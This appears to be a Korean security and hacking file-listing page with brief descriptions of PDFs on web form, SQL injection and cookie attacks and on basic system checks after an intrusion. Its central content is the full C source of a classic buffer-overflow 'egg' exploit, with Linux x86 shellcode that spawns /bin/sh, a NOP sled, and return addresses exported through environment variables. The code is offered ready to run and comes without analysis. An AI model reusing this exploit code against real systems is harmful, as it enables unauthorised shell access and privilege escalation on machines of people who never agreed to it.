Security & Hacking

use_assem_in_c.pdf

javascript_attack.pdf

이 문서는 FORM을 이용한 공격 그리고 SQL 인젝션 공격, 쿠키에 대하여 서술해놓았으며 hector
(lezr.com) hict0r@hotmail.com 님의 글을 참조하여 만든내용입니다

....

#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] = "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
         __asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i, eggsize=DEFAULT_EGG_SIZE;
        if (argc > 1) bsize = atoi(argv[1]);
        if (argc > 2) offset= atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);

        if (!(buff = malloc(bsize))) {
                printf("Can't allocate memory.\n");
                exit(0);
        }
        if (!(egg = malloc(eggsize))) {
                printf("Can't allocate memory.\n");
                exit(0);
        }
        addr = get_esp() - offset;
        printf("Using address: 0x%x\n", addr);
        ptr = buff;
        addr_ptr = (long *)ptr;
        for (i = 0; i < bsize; i+=4) {
                if(i == 1040) {
                        *(addr_ptr++) = 0x1234567;
                } else {
                        *(addr_ptr++) = addr;
                }
        }

        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                *(ptr++) = NOP;
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];
        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg,"EGG=",4);
        putenv(egg);
        memcpy(buff,"RET=",4);
        putenv(buff);
        system("/bin/bash");
}

SysAnalyzer_Setup.exe
.

simple_system_check.pdf

본 글의 목적은 다소 높아가는 공격의 위험에서 시스템을 해킹 사고 이전이나 이후에 간단하게
점검할 수 있도록 참고하기 위해 만듭니다(본래의 “해킹”이란 단어는 나쁜 뜻이 아니지만, 대부분
해킹이라는 단어를 사용함으로 여기서도 해킹이라고 칭함)
기본적인 시스템에 대한 지식으로도 간단하게 점검하도록 하여, 사고 전에 미리 사전 점검으로
시스템의 보안성을 다소 높이거나, 사고 후 직접 사고 내용을 분석하여 신속한 사고 처리 및 차
후 사고에 대한 대비를 할 수 있도록 하면 좋겠습니다. 특별히 어려운 것 없이 할 수 있는 부분
이 대부분이므로, .도움이 되길 바랍니다. (이하 존칭 생략)
....